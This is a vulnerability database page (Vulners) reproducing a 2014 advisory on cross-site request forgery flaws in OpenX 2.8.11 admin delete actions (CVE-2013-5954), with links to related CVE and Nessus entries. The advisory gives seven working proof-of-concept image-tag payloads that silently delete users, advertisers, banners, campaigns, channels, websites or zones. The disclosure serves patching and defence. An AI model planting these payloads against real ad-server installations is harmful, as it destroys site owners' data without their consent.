Vulners
Lucene search
OpenX 2.8.11 Cross Site Request Forgery
🗓️ 15 Mar 2014 00:00:00Reported by Mahmoud GhorbanzadehType 
packetstorm🔗 packetstormsecurity.com👁 29 Views
| Reporter | Title | Published | Views | Family All 9 |
|---|---|---|---|---|
 | CVE-2013-5954 | 15 Mar 201400:00 | – | circl |
 | CVE-2013-5954 | 25 Apr 201410:00 | – | cve |
 | CVE-2013-5954 | 25 Apr 201410:00 | – | cvelist |
 | EUVD-2013-5786 | 7 Oct 202500:30 | – | euvd |
 | CVE-2013-5954 | 25 Apr 201414:15 | – | nvd |
 | Cross site request forgery (csrf) | 25 Apr 201414:15 | – | prion |
 | Revive Adserver < 3.0.5 Multiple CSRF Vulnerabilities | 26 Jun 201400:00 | – | nessus |
 | [REVIVE-SA-2014-001] Revive Adserver 3.0.5 fixes CSRF vulnerability | 14 Jun 201400:00 | – | securityvulns |
| Web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl) | 14 Jun 201400:00 | – | securityvulns |
`
Hello,
Multiple
cross-site request forgery (CSRF) vulnerabilities in OpenX 2.8.11and earlier allows remote attackers to hijack the authentication of
administrators for requests that delete (1) users, (2) advertisers, (3) banners,
(4) campaigns, (5) channels, (6) websites or (7) zones via delete actions.
File: admin/agency-user-unlink.php
POC:
<img src='http://site/admin/agency-user-unlink.php?agencyid=1&userid=18' width="1" height="1" border="0">
File: admin/advertiser-delete.php
POC:
<img src='http://site/admin/advertiser-delete.php?clientid=10' width="1" height="1" border="0">
File: admin/banner-delete.php
POC:
<img
src='http://site/admin/banner-delete.php?clientid=2&campaignid=7&bannerid=16'
width="1" height="1" border="0">
File: admin/campaign-delete.php
POC:
<img src='http://site/admin/campaign-delete.php?clientid=2&campaignid=11' width="1" height="1" border="0">
File: admin/channel-delete.php
POC:
<img
src='http://site/admin/channel-delete.php?affiliateid=1&channelid=6'
width="1" height="1" border="0">
File: admin/affiliate-delete.php
POC:
<img
src='http://site/admin/affiliate-delete.php?affiliateid=9' width="1" height="1"
border="0">
File: admin/zone-delete.php
POC:
<img
src='http://site/admin/zone-delete.php?affiliateid=1&zoneid=11'
width="1" height="1" border="0">
Best regards.
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
15 Mar 2014 00:00Current
0.5Low risk
Vulners AI Score0.5
EPSS0.03267